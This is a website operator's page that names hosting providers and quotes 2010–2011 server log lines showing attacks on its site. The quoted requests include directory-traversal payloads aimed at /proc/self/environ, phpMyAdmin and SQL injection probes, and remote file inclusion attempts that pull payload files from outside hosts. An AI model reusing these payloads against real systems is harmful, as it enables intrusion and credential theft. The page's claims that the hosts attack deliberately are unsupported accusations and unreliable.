As the number of attacks from compromised servers and hosts increases we will publish details of the attacks from these servers as their webmasters are incapable and unwilling to rectify their issues. These hosts because of negligence, ignorance or on purpose, impact our business and therefore we are forced to list details of the attacks.
We do not recommend others to do business with the mentioned hosts, as they allow one way or another their servers to become attack platforms and abuse web tools, responsible for piracy, spam and scam in the internet.
For the inexperienced who read this page what do the entries mean? They show the requests from outsiders to access our server in a way that constitutes an attack. Attacks may target downloading login credentials for piracy, promoting scam, sending spam e-mails, compromise the software our server runs and other illegal web methods. The information posted was extracted directly from the server logs and represents a tiny sample using the URLs/Links only.
For the experienced you may wonder why we provide the full IP with the attack details? The answer is a host has ways to determine and can easily tell, if one of its clients performs malicious requests or when a server is compromised. Therefore odds are, these attacks take place on purpose. Denial of service, hack attempts, content scrap is now days a routine. Having serve these requests the bandwidth waste of our server would been high enough to deplete the allocated resources by our host.
The hosts in the entries listed below, represent the root hosts (not their customers). They have been notified on many occasions via emails and no action to correct problems was taken. Details of server logs are kept for over two years although the data posted here is quite recent. Responses from the hosts are typically automated and in the best case receiving a second email only states the host notified their "customers". In other words they notified the attacker about our report, since their servers are compromised. A truly great idea.
Each entry is taken from our server logs showing the exact IP, date and attack vector. Where appropriate, further details for the attack patterns are shown. IP associated with the host at the time of entry in the log.
Host: dreamhost.com multiple attacks denial of service attempts.
173.236.200.176 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.178.138 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.243.64 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.195.20 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.236.193.151 - - [05/Dec/2010:02:13:03 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.113.132.76 - - [05/Dec/2010:02:21:18 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.205.4.131 - - [05/Dec/2010:02:21:05 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.139.44 - - [05/Dec/2010:02:21:05 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.178.14 - - [05/Dec/2010:02:21:04 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
On purpose hack attempts by host, coordinated attacks to access folders with login credentials. Several IPs originated from dreamhost within a very short period of time also indicating DOS attemtps.
Host: 800hosting.net
IP/Details: 69.41.186.62 - - [03/Dec/2010:04:13:36 -0500] "GET //phpMyAdmin1/scripts/setup.php HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Compromised or on purpose hack attempts by host, database tools access attempt..
Host: imagikids.com
125.215.205.180 - - [03/Dec/2010:13:26:52 -0500] "GET //phpmyadmin/ HTTP/1.1" 301 5 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
Compromised or on purpose hack attempts by host, database access probe.
Host: presspublisher.com
IP/Details: 209.188.90.53 - - [02/Dec/2010:10:35:31 -0500] "GET //*.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host
Host: afraid.org
69.147.241.196 - - [03/Dec/2010:16:03:13 -0500] "GET /checkout_payment.php?id=' HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose SQL injection probe.
Host: vanet.com.br
IP/Details: 189.38.59.146 - - [02/Dec/2010:09:36:14 -0500] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host
Host: mochasupport.com
IP/Details: 70.87.135.194 - - [02/Dec/2010:09:32:16 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5
Compromised or on purpose hack attempts by host
Host: softlayer.com
IP/Details: 208.101.22.154 - - [02/Dec/2010:09:30:50 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5
Compromised or on purpose hack attempts by host
Host: emailsearchzone.info
IP/Details: 188.72.241.104 - - [02/Dec/2010:09:02:35 -0500] "GET /webdav/ HTTP/1.1" 301 5 "-" "Java/1.6.0_22"
Probe detection methods for specific scripts and folders
Host: worldnic.com
IP/Details: 216.38.49.38 - - [02/Dec/2010:09:00:46 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host
Host: hostmonster.com
IP/Details: 66.147.240.197 - - [02/Dec/2010:09:00:41 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.833"
Compromised or on purpose hack attempts by host
Host: njtech.com
IP/Details: 216.151.163.114 - - [02/Dec/2010:09:00:36 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, scans for private folders to download password or other details to gain access to the server.
Host: mydyndns.org
IP/Details: 72.249.167.184 - - [02/Dec/2010:01:08:37 -0500] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, scans for private folders to download password or other details to gain access to the server.
Host: cs-rds.ro
IP/Details: 86.123.139.71 - - [02/Dec/2010:00:28:38 -0500] "GET /index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download password or other details to gain access to the server.
Host: easyserver.net
IP/Details: 82.192.65.135 - - [01/Dec/2010:03:48:51 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download password or other details to gain access to the server.
Host: ovh.net
IP/Details: 87.98.217.201 - - [30/Nov/2010:01:35:32 -0500] "GET //index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download password or other details to gain access to the server.
94.23.218.45 - - [01/Nov/2010:23:13:18 -0400] "GET ////bbs_sun/board.php?admin=0x50sec.org&pgUp=http://varzo.webs.com/z1.txt?? HTTP/1.1" 301 5 "-" "Mozilla/5.0"
Remote File Injection attempt
94.23.6.59 - - [06/Nov/2010:04:17:02 -0400] "GET //*.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download password details
Host: iwsservers.com
205.251.131.33 - - [01/Nov/2010:14:58:14 -0400] "GET /?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 301 5
Compromised or on purpose hack attempts by host, Remote File Inclusion attempts
Host: 1and1.com
87.106.223.180 - - [01/Nov/2010:23:42:18 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, multiple attempts by the 1and1.com host to steal login credentials.
Host: mediatemple.net
205.186.131.223 - - [02/Nov/2010:02:31:20 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, path exploit to steal login credentials.
Host: uk2.net
77.92.74.100 - - [02/Nov/2010:02:31:54 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit and steal login information.
Host; pixelcarve.com
174.142.53.54 - - [02/Nov/2010:02:32:19 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit to steal login credentials.
Host: fastname.no
85.19.150.100 - - [02/Nov/2010:02:32:58 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.808"
Compromised or on purpose hack attempts by host, path exploit attemtps to steal login information.
Host: ThePlanet.com
69.93.76.2 - - [02/Nov/2010:03:41:05 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
On purpose hack attempts by host, path exploit attemtps to steal login information. Host is responsible for a huge number of attacks to our domain, spam emails, hack attempts. Probably the most notorious host over the web.
Host: proxad.net
88.183.92.209 - - [03/Nov/2010:01:21:52 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, path exploit attemtps to steal login information.
Host: name-server.com.au
113.20.10.185 - - [04/Nov/2010:17:31:14 -0400] "GET //Patch/catalog/admin/modules.php?module_directory=http://www.vai.com.au/xmlrpc/cache/data/sc1.txt????? HTTP/1.1" 301 5 "-" "Mozilla/5.0"
Compromised or on purpose hack attempts by host, follows Remote File Inclusion methods
Host infoferenda.net
92.52.71.146 - - [05/Nov/2010:01:56:22 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, path exploit attemtps to steal login information.
Host: stratoserver.net
85.214.156.86 - - [06/Nov/2010:04:16:57 -0400] "GET //*.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit attemtps to steal login information.
Host: webhostingspider.com
67.214.166.10 - - [06/Nov/2010:19:53:53 -0400] "GET //redirect.php?path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit attemtps to steal login information.
Host: ntdns.de
80.82.209.106 - - [07/Nov/2010:01:13:43 -0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Compromised or on purpose hack attempts by host, phpmyadmin probe to access database information. Repeated attempts using different paths.
Host: wiresix.com
66.71.254.10 - - [07/Nov/2010:01:40:48 -0400] "GET /oscommerce-vulnerabilities-10-08.asp//?path=http://www.yeshouse.net/column/lecture/Ckrid1.txt?? HTTP/1.1" 301 5 "-" "MaMa CaSpEr"
Compromised or on purpose hack attempts by host, Follows redirects performs remote file inclusion attacks.
Host: rackspace.com
67.192.61.235 - - [09/Mar/2011:10:27:56 -0500] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.79"
67.192.61.235 - - [11/Mar/2011:06:32:04 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.79"
Various hack attempts by host, Follows redirects performs remote file inclusion attacks. Despite our reports via email with dozens of hack attempts the attacks continue.
Host: leaseweb.com
95.211.48.9 - - [12/Mar/2011:11:51:45 -0500] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 301 5
95.211.48.9 - - [12/Mar/2011:11:57:55 -0500] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 301 5
Another notorious host, a breeding ground for spammers and scammers. Numerous hack attempts, spam emails, attempts to compromise other servers.
You may wonder how the server logs are generated. The server logs every /GET access from visitor. These logs in turn are parsed and the malicious attempts to compromise the server are identified. From the entries that show abuse in some way we follow their patterns and deciding what attacks are systematic.
Also note the listing is a sample there are repeated attacks which can span over the period of several years following different attack patterns. |
